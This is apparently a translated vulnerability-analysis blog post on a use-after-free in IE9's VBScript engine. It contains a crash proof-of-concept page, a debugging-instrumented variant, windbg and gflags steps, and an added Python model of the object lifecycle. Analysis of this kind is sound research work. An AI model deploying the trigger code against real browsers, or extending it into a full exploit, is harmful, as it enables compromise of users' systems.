Tags: vulnerability bsp finish hpa explore disable ram str nat
Environment: Win7 + IE9
Breakpoints:
1. Crash POC
<html lang="en">
<body>
<script language="vbscript">
Dim array_a
Dim array_b(1)

Class Trigger
    Private Sub Class_Terminate()
        Set array_b(0) = array_a(1)
        array_a(1) = 1
    End Sub
End Class

Sub UAF
    ReDim array_a(1)
    Set array_a(1) = New Trigger
    Erase array_a
End Sub

Sub TriggerVuln
    array_b(0) = 0
End Sub

Sub StartExploit
    UAF
    TriggerVuln
End Sub

StartExploit
</script>
</body>
</html>
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe /i iexplore.exe +hpa
Current Registry Settings for iexplore.exe executable are: 02000000
    hpa - Enable page heap
Add logging to verify the hypothesis further.
<html lang="en">
<body>
<script language="vbscript">
Dim array_a
Dim array_b(1)

' The IsEmpty calls carry no logic; they are markers that the
' breakpoint on vbscript!VbsIsEmpty stops on.
Class Trigger
    Private Sub Class_Terminate()
        Set array_b(0) = array_a(1)
        array_a(1) = 1
        IsEmpty(array_b)
    End Sub
End Class

Sub UAF
    ReDim array_a(1)
    Set array_a(1) = New Trigger
    IsEmpty(array_a)
    Erase array_a
    IsEmpty("Erase Finish")
End Sub

Sub TriggerVuln
    array_b(0) = 0
End Sub

Sub StartExploit
    UAF
    TriggerVuln
End Sub

StartExploit
</script>
</body>
</html>
At this point you can see that array_a(1) already points to the Trigger object; continue debugging. (When I stepped to this point windbg hung, so I had to kill it and start the debugging session over; the new array_a address is 0x081affe8.)
When execution reaches the third IsEmpty, array_a and the Trigger object have already been freed, yet array_b still holds a reference to the Trigger object.
The subsequent array_b(0) = 0 then accesses the freed memory, which triggers the UAF vulnerability.
Clearly, the Trigger object is freed along with Erase array_a while array_b still references it. Let's look at where the error happens.
After reading the pseudocode, verify the hypothesis further by debugging.
0:004> bl
 0 e 6b1e343d     0001 (0001)  0:**** vbscript!VbsErase
 1 e 6b1a5f1c     0001 (0001)  0:**** vbscript!VBScriptClass::Release
 2 e 6b1a583e     0001 (0001)  0:**** vbscript!VbsIsEmpty
Once inside vbscript!VBScriptClass::Release, disable the breakpoints above; otherwise single-stepping will break in places we do not want.
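A simplified Python model of the object lifecycle traced in the notes above, added here as an illustration (it is not code from the original post or from vbscript.dll): a reference count plus a Class_Terminate hook, replaying the POC's Set / Erase sequence. The `resurrection_check` flag is an assumed, generic mitigation for finalizer-resurrection bugs (re-check the refcount after Terminate ran and skip the free if a new reference was taken); it is not a description of the vendor's actual fix.

```python
class Obj:
    """COM-style object: intrusive refcount plus a Class_Terminate hook."""
    def __init__(self, name, on_terminate=None):
        self.name, self.refs, self.freed = name, 0, False
        self.on_terminate = on_terminate          # models Class_Terminate

class Heap:
    def __init__(self, resurrection_check):
        self.resurrection_check = resurrection_check   # assumed mitigation
        self.events = []
    def addref(self, obj):
        obj.refs += 1
    def release(self, obj):
        obj.refs -= 1
        if obj.refs > 0:
            return
        if obj.on_terminate:                      # refcount hit zero: run the
            obj.on_terminate(self)                # script's Class_Terminate
        if self.resurrection_check and obj.refs > 0:
            self.events.append(f"{obj.name}: resurrected, free skipped")
            return
        obj.freed = True                          # freed although Terminate
        self.events.append(f"{obj.name}: freed")  # may have re-taken a ref

def set_element(heap, arr, idx, obj):
    """Models 'Set arr(idx) = obj': AddRef the new value, Release the old."""
    old = arr[idx]
    heap.addref(obj)
    arr[idx] = obj
    if isinstance(old, Obj):
        heap.release(old)

def erase(heap, arr):
    """Models 'Erase arr': release each element while it still holds the pointer."""
    for i, val in enumerate(arr):
        if isinstance(val, Obj):
            heap.release(val)                     # Class_Terminate may run here
        arr[i] = None

def run_poc(heap):
    """Replays the page's POC; True means array_b(0) now points at a freed Trigger."""
    array_a, array_b = [None, None], [None, None]
    def class_terminate(h):                       # Class_Terminate body
        set_element(h, array_b, 0, array_a[1])    # Set array_b(0) = array_a(1)
        array_a[1] = 1                            # array_a(1) = 1
    trigger = Obj("Trigger", class_terminate)
    set_element(heap, array_a, 1, trigger)        # Set array_a(1) = New Trigger
    erase(heap, array_a)                          # Erase array_a
    return isinstance(array_b[0], Obj) and array_b[0].freed   # TriggerVuln's target
```

With the check disabled the model reproduces the page's observation: Erase frees the Trigger while array_b(0) still references it; with the check enabled the free is skipped and the reference stays valid.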
Original article: https://www.cnblogs.com/NicoleLiu/p/9319832.html